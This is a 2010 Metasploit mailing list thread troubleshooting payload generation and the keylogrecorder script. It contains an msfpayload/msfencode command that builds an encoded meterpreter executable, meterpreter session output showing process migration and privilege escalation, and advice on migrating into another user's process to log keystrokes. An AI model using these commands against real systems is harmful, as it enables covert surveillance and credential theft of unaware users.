Metasploit mailing list archives
Re: keylogrecorder not working with Terminal Service and Metasploit Portable working incorrectly to generate payloads.
From: c0lists <lists () carnal0wnage com>
Date: Thu, 2 Dec 2010 20:34:38 -0500
On Thu, Dec 2, 2010 at 7:36 PM, Richard Miles <richard.k.miles () googlemail com> wrote:
Hi Nice. Can I have a beta of this smartlocker?
not sure it will help you this time as the "fix" is to just pick the right one
Or can you share insides of details of how you solved this problem?
sure, pick the user you want to keylog, manually migrate into their process then run the keylogger
On Thu, Dec 2, 2010 at 5:47 PM, c0lists <lists () carnal0wnage com> wrote:Actually mubix and I will be releasing smartlocker shortly that should handle some of the issues with multiple winlogon sessions. guess this is a good kick in the butt to do that... -CG On Thu, Dec 2, 2010 at 6:17 PM, Richard Miles <richard.k.miles () googlemail com> wrote:Hi I ended unloading my antivirus and I was able to execute mspayload portable (last release available at Metasploit website), most of the features works very well, but when I try create a .exe payloads it's created but not on the correct way. I created using: C:\Temp\ruby\bin>ruby.exe ..\..\msf3\msfpayload windows/meterpreter/bind_tcp LHOST=127.0.0.1 R | ruby.exe ..\..\msf3\msfencode -e x86/shikata_ga_nai -t exe > test.exe [*] x86/shikata_ga_nai succeeded with size 326 (iteration=1) The test.exe was created, but when executed it start and finish (crash?) on the same second. If I generate the same payload from my Linux box it works very well. So, I believe it may be a bug. The other thing that called my attention is keylogrecorder from Carlos, it doesn't appear to work in Terminal Service environment with multiple users, See the output: meterpreter > run keylogrecorder -c 0 [*] explorer.exe Process found, migrating into 3247 [*] Migration Successful!! [*] explorer.exe Process found, migrating into 3622 [-] Error in script: Rex::RuntimeError Cannot migrate into this process (insufficient privileges) meterpreter > getuid Server username: MyDomain\User01 meterpreter > rev2self meterpreter > getuid Server username: MyDomain\User01 meterpreter > drop_token Relinquished token, now running as: MyDomain\User01 meterpreter > getuid Server username: MyDomain\User01 meterpreter > It clear finds the first exploit and migrate to it, but it continues on the loop and try to find the second user to migrate, but it failed because the previous migrated process is not administrator. I also tried to revert my privilege to admin with rev2self or drop_token but it doesn't work. My workaround was modify the script to look for a specific pid and end the loop when it found. But, should be nice a patch to fix it properly. Maybe ask for the name of the user to inject the keylogger, or maybe restore the older privileges before migrate on the next, maybe on this way we could keylogger all the sessions at the same time? Also, on this server I found a strange situation, where different sessions do not have a explorer.exe, consequently the script failed. I found a just a few executables in use for this users. I used pslist and I got the main process (using tree view - there are 2 main process), and I modified the keylogger to migrate to this process, but the crazy is that is just freeze. meterpreter > getsystem ...got system (via technique 1). meterpreter > run keylogrecorder -c 0 -t 15 [*] spshell.exe Process found, migrating into 1980 And it keep on this screen forever. Depending on the process, it just get stopped forever on this stage. On the other, it's also get stopped forever on this stage but the main process day. Anyone have seen anything like that? Ideas why it happens? How to solve the situation? I'm unable to view to record the user activity in this case. Anyone has any suggestion? Thanks _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- keylogrecorder not working with Terminal Service and Metasploit Portable working incorrectly to generate payloads. Richard Miles (Dec 02)
- Re: keylogrecorder not working with Terminal Service and Metasploit Portable working incorrectly to generate payloads. c0lists (Dec 02)
- Re: keylogrecorder not working with Terminal Service and Metasploit Portable working incorrectly to generate payloads. Richard Miles (Dec 02)
- Re: keylogrecorder not working with Terminal Service and Metasploit Portable working incorrectly to generate payloads. c0lists (Dec 02)
- Re: keylogrecorder not working with Terminal Service and Metasploit Portable working incorrectly to generate payloads. Richard Miles (Dec 14)
- Re: keylogrecorder not working with Terminal Service and Metasploit Portable working incorrectly to generate payloads. Richard Miles (Dec 02)
- Re: keylogrecorder not working with Terminal Service and Metasploit Portable working incorrectly to generate payloads. c0lists (Dec 02)